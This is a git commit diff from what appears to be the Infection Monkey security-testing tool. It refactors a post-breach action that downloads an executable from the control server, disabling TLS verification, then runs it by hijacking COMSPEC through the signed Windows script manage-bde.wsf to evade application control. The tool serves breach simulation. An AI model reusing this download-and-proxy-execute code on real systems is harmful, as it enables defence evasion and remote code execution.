CR changes
This commit is contained in:
parent
984a8c2251
commit
989286857b
|
@ -0,0 +1 @@
|
|||
T1216_PBA_FILE_DOWNLOAD_PATH = '/api/t1216-pba/download'
|
|
@ -2,12 +2,14 @@ import json
|
|||
import logging
|
||||
import platform
|
||||
from socket import gethostname
|
||||
from urllib.parse import urljoin
|
||||
|
||||
import requests
|
||||
from requests.exceptions import ConnectionError
|
||||
|
||||
import infection_monkey.monkeyfs as monkeyfs
|
||||
import infection_monkey.tunnel as tunnel
|
||||
from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
|
||||
from infection_monkey.config import GUID, WormConfiguration
|
||||
from infection_monkey.network.info import check_internet_access, local_ips
|
||||
from infection_monkey.transport.http import HTTPConnectProxy
|
||||
|
@ -328,7 +330,8 @@ class ControlClient(object):
|
|||
@staticmethod
|
||||
def get_T1216_pba_file():
|
||||
try:
|
||||
return requests.get("https://%s/api/t1216-pba/download/" % WormConfiguration.current_server, # noqa: DUO123
|
||||
return requests.get(urljoin(f"https://{WormConfiguration.current_server}/", # noqa: DUO123
|
||||
T1216_PBA_FILE_DOWNLOAD_PATH),
|
||||
verify=False,
|
||||
proxies=ControlClient.proxies,
|
||||
stream=True)
|
||||
|
|
|
@ -1,3 +1,4 @@
|
|||
import logging
|
||||
import subprocess
|
||||
|
||||
from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC
|
||||
|
@ -6,6 +7,8 @@ from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import
|
|||
cleanup_changes, get_commands_to_proxy_execution_using_signed_script)
|
||||
from infection_monkey.utils.environment import is_windows_os
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class SignedScriptProxyExecution(PBA):
|
||||
def __init__(self):
|
||||
|
@ -14,11 +17,14 @@ class SignedScriptProxyExecution(PBA):
|
|||
windows_cmd=' '.join(windows_cmds))
|
||||
|
||||
def run(self):
|
||||
try:
|
||||
original_comspec = ''
|
||||
if is_windows_os():
|
||||
original_comspec =\
|
||||
subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116
|
||||
|
||||
super().run()
|
||||
|
||||
except Exception as e:
|
||||
LOG.warning(f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}")
|
||||
finally:
|
||||
cleanup_changes(original_comspec)
|
||||
|
|
|
@ -1,5 +1,4 @@
|
|||
import os
|
||||
import subprocess
|
||||
|
||||
from infection_monkey.control import ControlClient
|
||||
|
||||
|
@ -8,11 +7,11 @@ TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe')
|
|||
|
||||
def get_windows_commands_to_proxy_execution_using_signed_script():
|
||||
download = ControlClient.get_T1216_pba_file()
|
||||
with open(TEMP_COMSPEC, 'wb') as file_obj:
|
||||
file_obj.write(download.content)
|
||||
file_obj.flush()
|
||||
with open(TEMP_COMSPEC, 'wb') as random_exe_obj:
|
||||
random_exe_obj.write(download.content)
|
||||
random_exe_obj.flush()
|
||||
|
||||
windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n') # noqa: DUO116
|
||||
windir_path = os.environ['WINDIR']
|
||||
signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf')
|
||||
|
||||
return [
|
||||
|
|
|
@ -6,6 +6,7 @@ from flask import Flask, Response, send_from_directory
|
|||
from werkzeug.exceptions import NotFound
|
||||
|
||||
import monkey_island.cc.environment.environment_singleton as env_singleton
|
||||
from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
|
||||
from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH
|
||||
from monkey_island.cc.database import database, mongo
|
||||
from monkey_island.cc.resources.attack.attack_config import AttackConfiguration
|
||||
|
@ -132,7 +133,7 @@ def init_api_resources(api):
|
|||
api.add_resource(Log, '/api/log', '/api/log/')
|
||||
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
|
||||
api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
|
||||
api.add_resource(T1216PBAFileDownload, '/api/t1216-pba/download/')
|
||||
api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH)
|
||||
api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
|
||||
'/api/fileUpload/<string:file_type>?load=<string:filename>',
|
||||
'/api/fileUpload/<string:file_type>?restore=<string:filename>')
|
||||
|
|
|
@ -8,8 +8,14 @@ __author__ = "shreyamalviya"
|
|||
class T1216(PostBreachTechnique):
|
||||
tech_id = "T1216"
|
||||
unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\
|
||||
"pre-existing signed script since it didn't run on any Windows machines."
|
||||
"pre-existing signed script since it didn't run on any Windows machines. " +\
|
||||
"If successful, this behavior could be abused by adversaries to execute malicious files that could " +\
|
||||
"bypass application control and signature validation on systems."
|
||||
scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\
|
||||
"pre-existing signed script on Windows but failed."
|
||||
used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows."
|
||||
"pre-existing signed script on Windows but failed. " +\
|
||||
"If successful, this behavior could be abused by adversaries to execute malicious files that could " +\
|
||||
"bypass application control and signature validation on systems."
|
||||
used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows. " +\
|
||||
"This behavior could be abused by adversaries to execute malicious files that could " +\
|
||||
"bypass application control and signature validation on systems."
|
||||
pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]
|
||||
|
|
Loading…
Reference in New Issue